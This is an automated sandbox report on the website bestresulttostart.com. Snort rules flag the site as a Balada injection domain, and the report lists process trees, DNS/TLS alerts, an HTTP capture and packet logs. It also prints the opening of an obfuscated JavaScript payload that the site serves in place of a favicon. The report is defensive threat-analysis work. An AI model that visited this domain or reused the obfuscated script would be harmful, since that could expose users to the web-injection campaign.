Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://bestresulttostart.com

Overview

General Information

Sample URL:http://bestresulttostart.com
Analysis ID:1428523
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 3748 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5724 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2020,i,16247492945876203200,15019927476780165016,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://bestresulttostart.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:04/19/24-05:49:16.344799
SID:2051948
Source Port:60584
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/19/24-05:49:16.344903
SID:2051948
Source Port:63323
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/19/24-05:49:17.914586
SID:2051949
Source Port:49740
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/19/24-05:49:21.253444
SID:2051949
Source Port:49745
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/19/24-05:49:15.610555
SID:2051948
Source Port:55600
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/19/24-05:49:15.610840
SID:2051948
Source Port:64132
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/19/24-05:49:16.669825
SID:2051949
Source Port:49737
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/19/24-05:49:21.110967
SID:2051948
Source Port:50499
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/19/24-05:49:21.111626
SID:2051948
Source Port:64262
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://bestresulttostart.com/Virustotal: Detection: 18%Perma Link
Source: http://bestresulttostart.comVirustotal: Detection: 18%Perma Link
Source: https://bestresulttostart.com/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.4:49744 version: TLS 1.2

Networking

barindex
Source: TrafficSnort IDS: 2051948 ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) 192.168.2.4:55600 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051948 ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) 192.168.2.4:64132 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051948 ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) 192.168.2.4:60584 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051948 ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) 192.168.2.4:63323 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051949 ET CURRENT_EVENTS Balada Domain in TLS SNI (bestresulttostart .com) 192.168.2.4:49737 -> 193.163.7.113:443
Source: TrafficSnort IDS: 2051949 ET CURRENT_EVENTS Balada Domain in TLS SNI (bestresulttostart .com) 192.168.2.4:49740 -> 193.163.7.113:443
Source: TrafficSnort IDS: 2051948 ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) 192.168.2.4:50499 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051948 ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) 192.168.2.4:64262 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051949 ET CURRENT_EVENTS Balada Domain in TLS SNI (bestresulttostart .com) 192.168.2.4:49745 -> 193.163.7.113:443
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bestresulttostart.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bestresulttostart.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bestresulttostart.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bestresulttostart.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bestresulttostart.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: unknownDNS traffic detected: queries for: bestresulttostart.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: classification engineClassification label: mal64.win@17/5@8/4
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2020,i,16247492945876203200,15019927476780165016,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://bestresulttostart.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2020,i,16247492945876203200,15019927476780165016,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://bestresulttostart.com18%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://bestresulttostart.com/18%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
bestresulttostart.com
193.163.7.113
truetrue
    unknown
    www.google.com
    172.253.124.104
    truefalse
      high
      fp2e7a.wpc.phicdn.net
      192.229.211.108
      truefalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://bestresulttostart.com/false
          unknown
          https://bestresulttostart.com/favicon.icotrue
            unknown
            http://bestresulttostart.com/trueunknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            239.255.255.250
            unknownReserved
            unknownunknownfalse
            172.253.124.104
            www.google.comUnited States
            15169GOOGLEUSfalse
            193.163.7.113
            bestresulttostart.comDenmark
            1935FR-RENATER-LIMOUSINReseauRegionalLimousinEUtrue
            IP
            192.168.2.4
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1428523
            Start date and time:2024-04-19 05:48:14 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 3m 28s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:browseurl.jbs
            Sample URL:http://bestresulttostart.com
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:8
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal64.win@17/5@8/4
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 142.250.105.94, 142.250.105.100, 142.250.105.102, 142.250.105.139, 142.250.105.113, 142.250.105.138, 142.250.105.101, 64.233.177.84, 34.104.35.123, 13.85.23.86, 72.21.81.240, 192.229.211.108, 13.85.23.206, 20.242.39.171, 108.177.122.94
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, wu.ec.azureedge.net, clientservices.googleapis.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, clients.l.google.com, glb.sls.prod.dcat.dsp.trafficmanager.net
            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtSetInformationFile calls found.
            No simulations
            No context
            No context
            No context
            No context
            No context
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (13785)
            Category:dropped
            Size (bytes):13786
            Entropy (8bit):5.3437849678241625
            Encrypted:false
            SSDEEP:384:5rUrsylveggod/jxOPZFixd7PXMcVYznQxeth4ukT/e6WmniyiR45nwdCKpD:5rUrsylGgBdLWZFixd7PXbVYznQxeo3S
            MD5:58D15C8061659EF77D42E8C5D3FF4984
            SHA1:4FEFB78331EE102E720C03A36265F3B286DF3457
            SHA-256:709F60C4E7BE64193C1EFF6ACA024338E157DA87200E114E84B061BFED693F98
            SHA-512:B19FADFBA525AFFA4A19B99F9B204BD6C4B74BEC88CF8892B5B17F996FF79C5782680EC9B57062600483226BD58CA5893EF61B95953B206E2EE1AC009DEF2885
            Malicious:false
            Reputation:low
            Preview:(function(_0x123a19,_0x2dcd19){function _0x58b634(_0x3c6ed8,_0x102246,_0x9a1abb,_0x389661,_0x5d6061){return _0x58cd(_0x102246- -0xec,_0x3c6ed8);}function _0x15d07a(_0x1737f1,_0x448d7e,_0x3fc385,_0x235f74,_0x443957){return _0x58cd(_0x443957- -0x2e2,_0x235f74);}function _0x116976(_0x597b29,_0x2fa573,_0x3e42bd,_0x196188,_0x53fc96){return _0x58cd(_0x597b29-0x1ee,_0x53fc96);}var _0x1430f8=_0x123a19();function _0x511da3(_0xf22f,_0x15463b,_0x1f767f,_0x439083,_0x19b8cf){return _0x58cd(_0x439083-0x202,_0x1f767f);}function _0x225522(_0x6ff1da,_0x442c73,_0x470e71,_0x4c5d16,_0x19b6ad){return _0x58cd(_0x442c73-0xb2,_0x6ff1da);}while(!![]){try{var _0xa9e9da=parseInt(_0x15d07a(-0x10a,-0x110,-0x123,'Zwyr',-0x11d))/(-0x1699+-0x23*-0x97+0x1f5*0x1)+parseInt(_0x15d07a(-0xe2,-0x106,-0x12f,'qMqR',-0x102))/(0xcb+-0x9*0x2c5+0x1824)*(parseInt(_0x15d07a(-0xf7,-0x143,-0xe6,'c6gW',-0x117))/(0xced+0x3*-0xa13+0x114f))+-parseInt(_0x225522('Zwyr',0x2c6,0x2ee,0x2c9,0x302))/(0xd5d+-0x1b70+0xe17)*(-parseInt(_0x15d07a(-0
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:HTML document, ASCII text
            Category:downloaded
            Size (bytes):2569
            Entropy (8bit):5.189345850041082
            Encrypted:false
            SSDEEP:48:Sv+g8d7+CZirJpGs3kGKsljbMeiHr6Gn3kIt5NtvQ7C3kIS3kInzKxr:S+C51MHr6GrrI79KB
            MD5:6A7720F00CDB8F8EF45A710192A61129
            SHA1:49C333915A22CB5ADD86906888D96FB66C22A50A
            SHA-256:DBD92BDD8B0BD06903D4922F102B3648D42E6EA2788B5FAEA4164466A1F5CA43
            SHA-512:EAA09707EF36C0A86AD5BC7537D27125828B2ACB4D67F3DDD2D2229E4554685C907A1757E9895756D5186714384B572568E1171FDD3E51ADD848DB4BB09B699F
            Malicious:false
            Reputation:low
            URL:https://bestresulttostart.com/
            Preview:<!DOCTYPE html>.<html lang="en">..<head>...<meta charset="utf-8" />...<meta name="viewport" content="width=device-width, initial-scale=1" />...<title>Coming Soon</title>...<style>....body {.....background-color: #f5f5f5;.....margin-top: 8%;.....color: #5d5d5d;.....font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,......"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol",......"Noto Color Emoji";.....text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);.....text-align: center;....}.....h1 {.....font-size: 2.45em;.....font-weight: 700;.....color: #5d5d5d;.....letter-spacing: -0.02em;.....margin-bottom: 30px;.....margin-top: 30px;....}......container {.....width: 100%;.....margin-right: auto;.....margin-left: auto;....}......animate__animated {.....animation-duration: 1s;.....animation-fill-mode: both;....}......animate__fadeIn {.....animation-name: fadeIn;....}......info {.....color: #5594cf;.....fill: #5594cf;....}...
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (13785)
            Category:downloaded
            Size (bytes):13786
            Entropy (8bit):5.3437849678241625
            Encrypted:false
            SSDEEP:384:5rUrsylveggod/jxOPZFixd7PXMcVYznQxeth4ukT/e6WmniyiR45nwdCKpD:5rUrsylGgBdLWZFixd7PXbVYznQxeo3S
            MD5:58D15C8061659EF77D42E8C5D3FF4984
            SHA1:4FEFB78331EE102E720C03A36265F3B286DF3457
            SHA-256:709F60C4E7BE64193C1EFF6ACA024338E157DA87200E114E84B061BFED693F98
            SHA-512:B19FADFBA525AFFA4A19B99F9B204BD6C4B74BEC88CF8892B5B17F996FF79C5782680EC9B57062600483226BD58CA5893EF61B95953B206E2EE1AC009DEF2885
            Malicious:false
            Reputation:low
            URL:https://bestresulttostart.com/favicon.ico
            Preview:(function(_0x123a19,_0x2dcd19){function _0x58b634(_0x3c6ed8,_0x102246,_0x9a1abb,_0x389661,_0x5d6061){return _0x58cd(_0x102246- -0xec,_0x3c6ed8);}function _0x15d07a(_0x1737f1,_0x448d7e,_0x3fc385,_0x235f74,_0x443957){return _0x58cd(_0x443957- -0x2e2,_0x235f74);}function _0x116976(_0x597b29,_0x2fa573,_0x3e42bd,_0x196188,_0x53fc96){return _0x58cd(_0x597b29-0x1ee,_0x53fc96);}var _0x1430f8=_0x123a19();function _0x511da3(_0xf22f,_0x15463b,_0x1f767f,_0x439083,_0x19b8cf){return _0x58cd(_0x439083-0x202,_0x1f767f);}function _0x225522(_0x6ff1da,_0x442c73,_0x470e71,_0x4c5d16,_0x19b6ad){return _0x58cd(_0x442c73-0xb2,_0x6ff1da);}while(!![]){try{var _0xa9e9da=parseInt(_0x15d07a(-0x10a,-0x110,-0x123,'Zwyr',-0x11d))/(-0x1699+-0x23*-0x97+0x1f5*0x1)+parseInt(_0x15d07a(-0xe2,-0x106,-0x12f,'qMqR',-0x102))/(0xcb+-0x9*0x2c5+0x1824)*(parseInt(_0x15d07a(-0xf7,-0x143,-0xe6,'c6gW',-0x117))/(0xced+0x3*-0xa13+0x114f))+-parseInt(_0x225522('Zwyr',0x2c6,0x2ee,0x2c9,0x302))/(0xd5d+-0x1b70+0xe17)*(-parseInt(_0x15d07a(-0
            No static file info
            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
            04/19/24-05:49:16.344799UDP2051948ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com)6058453192.168.2.41.1.1.1
            04/19/24-05:49:16.344903UDP2051948ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com)6332353192.168.2.41.1.1.1
            04/19/24-05:49:17.914586TCP2051949ET CURRENT_EVENTS Balada Domain in TLS SNI (bestresulttostart .com)49740443192.168.2.4193.163.7.113
            04/19/24-05:49:21.253444TCP2051949ET CURRENT_EVENTS Balada Domain in TLS SNI (bestresulttostart .com)49745443192.168.2.4193.163.7.113
            04/19/24-05:49:15.610555UDP2051948ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com)5560053192.168.2.41.1.1.1
            04/19/24-05:49:15.610840UDP2051948ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com)6413253192.168.2.41.1.1.1
            04/19/24-05:49:16.669825TCP2051949ET CURRENT_EVENTS Balada Domain in TLS SNI (bestresulttostart .com)49737443192.168.2.4193.163.7.113
            04/19/24-05:49:21.110967UDP2051948ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com)5049953192.168.2.41.1.1.1
            04/19/24-05:49:21.111626UDP2051948ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com)6426253192.168.2.41.1.1.1
            TimestampSource PortDest PortSource IPDest IP
            Apr 19, 2024 05:49:05.222426891 CEST49675443192.168.2.4173.222.162.32
            Apr 19, 2024 05:49:14.970575094 CEST49675443192.168.2.4173.222.162.32
            Apr 19, 2024 05:49:15.931778908 CEST4973580192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:15.932070017 CEST4973680192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:16.136336088 CEST8049736193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:16.136486053 CEST4973680192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:16.136811972 CEST4973680192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:16.141014099 CEST8049735193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:16.141102076 CEST4973580192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:16.340935946 CEST8049736193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:16.341054916 CEST8049736193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:16.457820892 CEST4973680192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:16.669339895 CEST49737443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:16.669446945 CEST44349737193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:16.669538975 CEST49737443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:16.669825077 CEST49737443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:16.669857979 CEST44349737193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:17.101530075 CEST44349737193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:17.101929903 CEST49737443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:17.101958036 CEST44349737193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:17.103406906 CEST44349737193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:17.103473902 CEST49737443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:17.104559898 CEST49737443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:17.104650021 CEST44349737193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:17.104774952 CEST49737443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:17.104782104 CEST44349737193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:17.159094095 CEST49737443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:17.505379915 CEST44349737193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:17.505481005 CEST44349737193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:17.505537033 CEST49737443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:17.505578041 CEST44349737193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:17.505796909 CEST44349737193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:17.505847931 CEST49737443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:17.810813904 CEST49737443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:17.810857058 CEST44349737193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:17.913486004 CEST49740443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:17.913516998 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:17.913572073 CEST49740443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:17.914586067 CEST49740443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:17.914598942 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:18.353310108 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:18.394223928 CEST49740443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:18.397355080 CEST49740443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:18.397362947 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:18.398551941 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:18.399034023 CEST49740443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:18.399207115 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:18.399420977 CEST49740443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:18.440136909 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:18.804687023 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:18.804759979 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:18.804812908 CEST44349740193.163.7.113192.168.2.4
